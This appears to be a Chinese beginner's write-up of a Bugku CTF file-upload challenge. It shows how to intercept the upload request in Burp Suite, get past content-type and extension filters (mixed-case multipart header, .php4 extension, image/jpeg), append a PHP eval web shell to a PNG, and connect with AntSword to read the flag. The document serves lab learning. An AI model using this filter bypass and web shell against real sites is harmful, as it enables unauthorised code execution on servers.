bugkuctf-web-文件上传（kali操作）

一、题目描述：

二、启动场景

My name is margin,give me a image file not a php

可以上传图片但不可以上传php文件，说明存在三个过滤：

• 请求头部的 Content-Type
• 文件后缀
• 请求数据的Content-Type

三、解题流程

1、上传文件就想到可以用burpsuite抓包修改数据，先在本地找个截图上传(建议截图小一点，一小块就行)，点击submit的时候开始抓包，并右键选择send to repeat送到repeat模块

2.修改请求头

请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data
所上传的文件后缀 改为 .php4
请求数据的Content-Type 内容改为 image /jpeg

在PNG文件末尾添加一句木马：<?php eval($_POST['cmd']); ?>

3.重新发送请求后的数据

数据修改好后点击send发送，会显示4.打开蚁剑进行连接

右键点击添加数据，注意URL地址不要有额外的参数（只有IP地址和bp返回的链接），密码是木马里面的参数，这里是cmd。最后最后最后，一定记得点添加！！！

5.找flag

双击进入，回到根目录，找到flag，双击打开即可获得四、声明

这篇文章是我首次所创，格式不太美观请将就一下，主要是因为我看其他人的答题心得对新手来说（别问我咋看出来的，我就是新手）不太容易理解和操作，所以就结合一些他们的心得进行创作。